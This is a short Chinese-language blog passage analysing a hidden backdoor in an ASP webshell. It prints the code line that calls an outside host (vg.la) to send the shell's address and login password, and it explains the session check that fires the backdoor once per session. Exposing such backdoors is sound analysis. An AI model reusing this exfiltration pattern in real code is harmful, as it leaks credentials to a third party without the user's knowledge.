url('http://vg.la/1/?u=localhost/c.asp&p=111')
列位看官,我想你已经看出来了,这段代码通过CURSOR的远程url调用,将你的shell地址和登录密码发送给远程程序处理。
现在我们回过头来看这段代码,初步查看代码时我以为它是首先判断这个shell是否在内网或者本地调试,如果不是然后执行下面的代码,结果发现这个功能并没有实现,全文在别处找不到Serveru的信息,那么永远也无法判断是否在本地或者内网,即无论运行在哪个环境都将执行后门代码。然后将执行 session("servec")的一个判断,可以看到它还包含一个判断就是Action是否为空,如果为空就不执行后门代码,初始化 session("servec")并加一,如果是那么就执行。可以看到在退出shell的时候并没有清空session("servec"),那么也就是说一般只会在session("servec")=1时执行一次后门代码,防止反复提交同样的数据!
您可能感兴趣的文章: